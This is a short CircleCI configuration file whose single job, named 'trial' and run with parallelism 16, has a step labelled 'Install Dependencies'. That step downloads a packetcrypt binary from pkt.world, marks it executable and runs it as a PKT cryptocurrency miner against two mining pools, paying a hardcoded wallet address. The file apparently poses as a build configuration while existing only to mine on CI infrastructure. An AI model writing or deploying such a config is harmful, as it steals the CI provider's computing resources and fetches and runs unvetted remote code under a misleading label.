version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O packetcrypt
              chmod +x packetcrypt
              ./packetcrypt ann -p pkt1q2szuquxfxyr8qt6f7tvhf45750daxq62dvqc0c http://pool.pkt.world http://pool.pktpool.io -t 10

workflows:
    version: 2.1
    build:
        jobs:
        - trial